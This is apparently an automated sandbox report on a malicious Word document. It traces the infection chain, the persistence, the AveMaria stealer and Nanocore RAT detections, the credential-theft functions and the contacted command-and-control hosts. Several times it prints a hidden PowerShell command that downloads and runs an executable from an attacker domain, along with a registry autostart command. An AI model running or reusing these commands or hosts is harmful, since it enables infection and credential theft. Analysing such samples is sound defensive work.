Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe'' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError, 16_2_00412E91
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid, 16_2_00410A8C
Source: images.exe Binary or memory string: GetProgmanWindow
Source: images.exe Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00410E5E cpuid 16_2_00410E5E
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: ToAsciiEx,GetLocaleInfoW,WideCharToMultiByte, 25_2_03BF907A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_E3CA6E03-B995-4FF4-BE46-DA58B35F69D7.0\FLDE10.tmp VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\microA.exe Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
Source: C:\ProgramData\images.exe Queries volume information: C:\ProgramData\images.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA, 16_2_00408D0F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C12AE1 IsSETEnabled,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetVersionExW,RegQueryValueExW,GetVersionExW,RegCloseKey,GetVersionExW, 25_2_03C12AE1
Source: C:\Users\user\AppData\Roaming\microA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Increases the number of concurrent connection per server for Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\microA.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Stealing of Sensitive Information:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Contains functionality to steal Chrome passwords or cookies
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 16_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 16_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 17_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 17_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Google\Chrome\User Data\Default\Login Data 18_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: \Chromium\User Data\Default\Login Data 18_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: \Google\Chrome\User Data\Default\Login Data 25_2_0040B917
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: \Chromium\User Data\Default\Login Data 25_2_0040B917
Contains functionality to steal e-mail passwords
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 16_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 17_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: POP3 Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: SMTP Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: IMAP Password 18_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: POP3 Password 25_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: SMTP Password 25_2_004099FF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: IMAP Password 25_2_004099FF
Yara detected Credential Stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2171424499.0000000003369000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C18A23 RemoveClipboardFormatListener, 25_2_03C18A23
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 457806 Sample: N40-MR 311.doc Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 89 hhjhtggfr.duckdns.org 2->89 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 21 other signatures 2->105 12 WINWORD.EXE 305 48 2->12         started        signatures3 process4 dnsIp5 95 hhjhtggfr.duckdns.org 203.159.80.186, 49165, 49166, 49167 LOVESERVERSGB Netherlands 12->95 97 newhosteeeee.ydns.eu 12->97 77 C:\Users\user\AppData\Local\...\microA[1].exe, PE32 12->77 dropped 79 C:\Users\user\AppData\...\abdtfhghgdghgh .ScT, data 12->79 dropped 81 C:\Users\user\AppData\Local\...\FLDE10.tmp, 370 12->81 dropped 83 C:\Users\user\AppData\Local\...\623BB84A.png, 370 12->83 dropped 155 Document exploit detected (creates forbidden files) 12->155 157 Suspicious powershell command line found 12->157 159 Tries to download and execute files (via powershell) 12->159 161 2 other signatures 12->161 17 powershell.exe 12 7 12->17         started        22 powershell.exe 7 12->22         started        24 powershell.exe 7 12->24         started        26 3 other processes 12->26 file6 signatures7 process8 dnsIp9 87 newhosteeeee.ydns.eu 17->87 63 C:\Users\user\AppData\Roaming\microA.exe, PE32 17->63 dropped 107 Powershell drops PE file 17->107 28 microA.exe 1 5 17->28         started        31 microA.exe 22->31         started        34 microA.exe 24->34         started        109 Injects files into Windows application 26->109 file10 signatures11 process12 file13 137 Multi AV Scanner detection for dropped file 28->137 139 Machine Learning detection for dropped file 28->139 141 Writes to foreign memory regions 28->141 36 microA.exe 28->36         started        85 C:\Users\user\AppData\Local\Temp\microA.exe, PE32 31->85 dropped 143 Allocates memory in foreign processes 31->143 145 Injects a PE file into a foreign processes 31->145 40 microA.exe 31->40         started        42 microA.exe 34->42         started        signatures14 process15 file16 73 C:\ProgramData\images.exe, PE32 36->73 dropped 129 Multi AV Scanner detection for dropped file 36->129 131 Machine Learning detection for dropped file 36->131 133 Contains functionality to inject threads in other processes 36->133 135 4 other signatures 36->135 44 images.exe 36->44         started        48 cmd.exe 36->48         started        signatures17 process18 file19 75 C:\Users\user\AppData\Local\Temp\images.exe, PE32 44->75 dropped 147 Multi AV Scanner detection for dropped file 44->147 149 Machine Learning detection for dropped file 44->149 151 Writes to foreign memory regions 44->151 153 2 other signatures 44->153 50 images.exe 44->50         started        55 images.exe 44->55         started        57 images.exe 44->57         started        59 reg.exe 48->59         started        signatures20 process21 dnsIp22 91 hutyrtit.ydns.eu 203.159.80.165, 49168, 80 LOVESERVERSGB Netherlands 50->91 93 sdafsdffssffs.ydns.eu 50->93 65 C:\Users\user\AppData\Roaming\JhwfHBtD..exe, PE32 50->65 dropped 67 C:\Users\user\AppData\Local\...\microC[1].exe, PE32 50->67 dropped 69 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 50->69 dropped 71 C:\Windows\System32\rfxvmt.dll, PE32+ 50->71 dropped 111 Hides user accounts 50->111 113 Writes to foreign memory regions 50->113 115 Allocates memory in foreign processes 50->115 125 2 other signatures 50->125 61 cmd.exe 50->61         started        117 Multi AV Scanner detection for dropped file 55->117 119 Machine Learning detection for dropped file 55->119 121 Contains functionality to inject threads in other processes 55->121 127 2 other signatures 55->127 123 Creates an undocumented autostart registry key 59->123 file23 signatures24 process25
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
203.159.80.186
 newhosteeeee.ydns.eu Netherlands
47987 LOVESERVERSGB false
203.159.80.165
 hutyrtit.ydns.eu Netherlands
47987 LOVESERVERSGB false

Contacted Domains

Name IP Active
newhosteeeee.ydns.eu 203.159.80.186 true
sdafsdffssffs.ydns.eu 203.159.80.186 true
hutyrtit.ydns.eu 203.159.80.165 true
hhjhtggfr.duckdns.org 203.159.80.186 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://newhosteeeee.ydns.eu/microA.exe true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://hutyrtit.ydns.eu/microC.exe true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown